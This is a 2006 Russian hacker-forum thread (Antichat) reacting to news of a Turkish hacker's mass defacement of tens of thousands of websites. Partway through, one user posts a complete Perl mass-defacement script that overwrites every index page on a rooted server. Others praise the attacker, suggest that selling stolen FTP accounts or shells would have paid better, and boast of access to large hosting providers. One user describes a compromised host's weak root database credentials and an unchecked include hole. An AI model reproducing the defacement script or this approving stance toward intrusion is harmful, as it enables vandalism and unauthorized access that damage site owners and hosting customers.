Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)
-   -   Зарегистрирован самый массовый в истории взлом веб-сайтов (https://forum.antichat.xyz/showthread.php?t=19824)

Гаврила 28.05.2006 20:44
Зарегистрирован самый массовый в истории взлом веб-сайтов
 
На прошлой неделе специалисты по вопросам компьютерной безопасности зафиксировали крупнейший в истории интернета взлом веб-сайтов. За считанные часы, хакеру Iskorpitx удалось проникнуть на 21 549 веб-сайтов, а впоследствии злоумышленник "улучшил" свой рекорд еще на 17 тысяч ресурсов.

Хакер Iskorpitx - достаточно хорошо известная личность в кругах киберпреступников. На счету злоумышленника, особо даже не пытающегося скрывать следы своей деятельности, сотни атак на крупные онлайновые ресурсы, в том числе сайты правительственных организаций

Айовы, Джорджии и Теннеси. В марте нынешнего года взломал сайт министерства внутренних дел Бурятии, оставив на нем надпись "HACKED BY iSKORPiTX (TURKISH HACKER)".

На этот раз киберпреступнику удалось оставить сообщения на почти 40 тысячах онлайновых ресурсов. В тексте послания значилось следующее: "HACKED BY Iskorpitx (TURKISH HACKER) FUCKED ARMANIAN-FUCKED FRANCE-FUCKED GREECE-FUCKED PKK TERROR iscorpitx, marque du monde, presente ses salutations a tout le monde".
Кроме того, сообщение сопровождалось турецким флагом.
HiTech.Expert

dinar_007 28.05.2006 21:07
Я видел несколько этих дефейсов =) Кто-то (не помню кто) мне в аську сЦылы кидал на эти сайты...

SanyaX 28.05.2006 21:17
Взломал хостинг суперский. Написал скрипт, задефейсил сайты. Красава турецкая. Воще турки лохи!

*[poison]* 29.05.2006 00:14
Цитата:
Сообщение от SanyaX
Воще турки лохи!
100 % меня когда то турок на аську кинул, теперь я их ненавижу :(

Nova 29.05.2006 00:24
Не всё равно жесть 17 тысяч дефейсов даже за сутки этож ****ец просто =)

x-ultra-x 29.05.2006 00:47
Уже давно вышла эта новость )
что сказать уже дефейсы со стороны турецких хакеров сталди спортом и политической целью - как всегда обосрать армян.
З.Ы: А у моего знакомого аську - наш же украл, и что наших тоже считать лохами?

Sw%00p 29.05.2006 01:00
а чё так трудно дефейснуть за сутки 17 тысяч сайтов?

есть рут значит пишем bash скрипт который автоматически заменит все файлы index.html иди php на своё нутро Ё

17 тысяч это не круто вот подомной 139 тысяч правда рут надо расшифровать

LoFFi 29.05.2006 01:06
та... не удевил =))

зачем было дефейсить? 21000 сайтов! да продать фтп акки - огого сколько бабла! А покупателей МОРЕ..... ведет себя как киддис.... тупой какой то... или это типа самореклама?

Sw%00p 29.05.2006 01:09
турки вооще банальные им лиж бы известность нет бы контроль на всем пространством
и баксов куча

x-ultra-x 29.05.2006 01:23
Да я же говорю что это лишь себя попиарить.
А так побольше бы настоящих турецких хак команд,таких как SiS например.

Desr0w 29.05.2006 01:57
Ну пару хостингов он наверно порутал...
Но,повел себя как тупой кидис.
К слову:
Код:
#!/usr/bin/perl

exit print "Usage: $0 [deface file] [deface mask]\n" if ($ARGV[0] eq '--help');

$template=$ARGV[0] || 'deface.txt';
$ext=$ARGV[1] || 'index.html';
$backup=1;
$debug=1;
print "Searching documents... Please, wait some minutes\n" if $debug;
system("find / -name \"$ext\" > /tmp/defaces 2>/dev/null");
open(TXT,$template) || die "Cannot find deface text!\n";
@deface=<TXT>;
close(TXT);
open(MASS,"/tmp/defaces") || die "Sorry, no htmls docs found!\n";
while(<MASS>) {
chomp;
if ($backup) {
my $bname="$_".".old";
system("cp \"$_\" \"$bname\"");
}
open(DEFACED,">$_");
print DEFACED @deface;
close(DEFACED);
print "$_ defaced!\n" if $debug;
}
close(MASS);
unlink("/tmp/defaces");
print "All defaces done!\n";

TreniX 29.05.2006 02:47
Вот один дефейс _http://forum.pravda.org.ua/ Hacked by BeLa

TreniX 29.05.2006 02:54
И вот _http://www.dmp.com.ua/forum/index.php? падлы турецкие!

[Zarakul] 29.05.2006 11:09
Цитата:
За считанные часы, хакеру Iskorpitx удалось проникнуть на 21 549 веб-сайтов, а впоследствии злоумышленник "улучшил" свой рекорд еще на 17 тысяч ресурсов.
Было бы круто, если кто-нить из ачатовцев похвастался таким же результатом =)

[Zarakul] 29.05.2006 11:12
А вот их статистика http://www.secrethackers.org/

k1b0rg 29.05.2006 12:20
чот я смотрю а сайты, то почти все форумные..........

TreniX 29.05.2006 18:13
И почти все на phpBB движке!

TreniX 29.05.2006 19:07
Может стоит создать раздел "дефейс-лента" ну типа "Defaced by ****" для antichat.ru

Rebz 29.05.2006 19:14
а может вы все пойдете лесом со своими дефейсами, дети?

Otaku 29.05.2006 19:16
Да это массовое использование баги. Сплойтом короче.

KoTeG 29.05.2006 19:43
Да короче этот парниша молодца,так как не каждый может похвастаться таким результатом!

LoFFi 29.05.2006 20:11
Цитата:
Сообщение от KoT
Да короче этот парниша молодца,так как не каждый может похвастаться таким результатом!
Не смеши! Так как он - ведут себя только киддисы!
В этом, как уже говорили, ничего сложного нет. И имея на руках доступ к хостингу, массовый деф - самое тупое что можно придумать.

Abra 29.05.2006 20:11
Цитата:
Сообщение от Otaku
Да это массовое использование баги. Сплойтом короче.
Дык. Ну ясен перец он не каждый сайт как индивидуум дефейсил - сплойты искал )))) и все за одни сутки ;) Просто потратил время, написал неплохой скрипт для поиска и юзания одной и той же баги на сайтах. За скрипт можно еще респект высказать, а за дефейсы - пиар простой :)

lexa 29.05.2006 20:55
Цитата:
Сообщение от LoFFi
И имея на руках доступ к хостингу, массовый деф - самое тупое что можно придумать.

дык , ему то не админы давали доступ к серверам, ты сначала взломай хост с большим числом ,
кстати могу выложить базу infobox вот когда её сломали , то там мы могли задефейсить за минуты около 17 тысяч , но не сделали этого потому что были другие цели! и мне кажется тут каждый (ну почти ) может таким похвастаться, так что в самом дефейсе нет нечего кульного , а больше тупая реклама , а вот сам факт!!!!

LoFFi 29.05.2006 21:00
Цитата:
Сообщение от lexa
дык , ему то не админы давали доступ к серверам, ты сначала взломай хост с большим числом ,
Молчал бы уже! У меня ща доступ к 2 крупным хостам(мелочь не в счет). Общее кол-во сайтов примерно 125 000

Хостинги оч крупные... об одном из них уже известно мемберам...

ZINGER 29.05.2006 21:05
это утомительно и никому не нужно....

GreenBear 29.05.2006 21:50
Цитата:
это утомительно и никому не нужно....
Да ладно, вон какая тема обсуждаемая... Дефы для того и делают, чтобы их заметили =)

NeMiNeM 30.05.2006 00:06
Кстати чуваку, как пишут, 45 лет...

NIGHT_WOLF 30.05.2006 05:55
Человеку нужен был пиар и он его себе сделал.
Возможно теперь он получит себе денег гораздо больше чем продавая аккаунты, он зарекламировал себя как неплохой хакер и теперь будет сидеть и ждать заказов...

[Zarakul] 05.06.2006 12:23
night_wolf
После таких тем с обсуждениям хакера врядли кто захочет нанимаеть его.

iNcluDe 05.06.2006 15:21
лажа, всё это, в место того что бы бобоса срубить чел просто всё загубил. надо всё с умом использовать ;)

BsdWalker 14.06.2006 17:14
Не ну чел ступил так это точно....попиарился, а дальше? А так срубил бабок туеву хучю...

Otaku 14.06.2006 17:54
Пиар конечно,но сомнительный. Круче было бы крутой сайт ломануть.

TheFile 14.06.2006 18:50
Цитата:
Сообщение от Otaku
Пиар конечно,но сомнительный. Круче было бы крутой сайт ломануть.
да ландно.... 17к шеллов тоже не Хреново ;)

Otaku 14.06.2006 19:01
Кстати... Их можно было быстренько загнать.

hidden 14.06.2006 19:11
Вы все на него, ступил, бабла не срубил, а может у него бабла до***а, а он репутацию зарабатывает или может у них в турции что-то вроде отбора в кулхацкеры, "чем больше взломаешь, тем лучьше".

+toxa+ 14.06.2006 19:23
Цитата:
Сообщение от TheFile
да ландно.... 17к шеллов тоже не Хреново ;)
17к шеллов на одном=двух серве?)) не шути так))))

Azazel 14.06.2006 19:58
Пока есть хостинги, у которых на сайтах присутствуют скулы или инклюды, нашей братве будет чем заняться. По крайней мере энная кучка таких хостёров очень просто находится в гугле.
Меня просто бесит, когда хостёры не прочитав самой ламёрской статьи про безопасность в сети, становяться хостёрами. Особенно когда с правами рута подключаешься к базе. Только с логином "root". И без пароля. Так он и ёб**л наверное парочку хостёров со всеми выходящими.
ИМХО: Он наверное поналупил таких хостёров штук несколько и дефнул их автоматом.
И кстати откуда такие точные цифры.
И вобще, в начале статьи 21 тысяча жертв, а в конце 40. Не стыкуется..

А по идее хакер этот вобще идейный человек. Молодца, в любом случае. Хотя я могу и ошибаться.

Ибо любой хостёр просто обязан указывать у себя на сайте, что-то на тему privacy information. И разумеется соблюдать. Иначе жертвами станем не мы, кто занимается секюрети, а простые юзеры, которые ничем никому не обязаны.

blackybr 14.06.2006 20:07
Выцепил на одном из серваков агавы -

<?php
$host = "localhost";
$user = "****_root";
$pass = "root";
$db = "****_db";
$server = mysql_connect($host,$user,$pass);
mysql_select_db($db,$server);
$site_host="****";
?>
в **** одно и тоже )

на серваке хостятся около сотни сайтов... в баш хистори попадаются такие записи -

s
[root pass]
su
[root pass in ***] (типа ошибаются)

на сайте тупой инклуд, не проверяемый вообще ничем...

это я к тому, что даже такой крупный как агава совершенно не следят за сервами, за содержимым и тд... взялся за предоставление хостинга - хотя бы смотри за тем какие дырявые скрипты ставят на них...

Azazel 14.06.2006 20:30
2 blackybr/ На агаве хостится больше чем 100 сайтов.
Если там нет пароля, в этом скрипте. - это ничего не значит.
На самом деле пароль есть.


Время: 16:19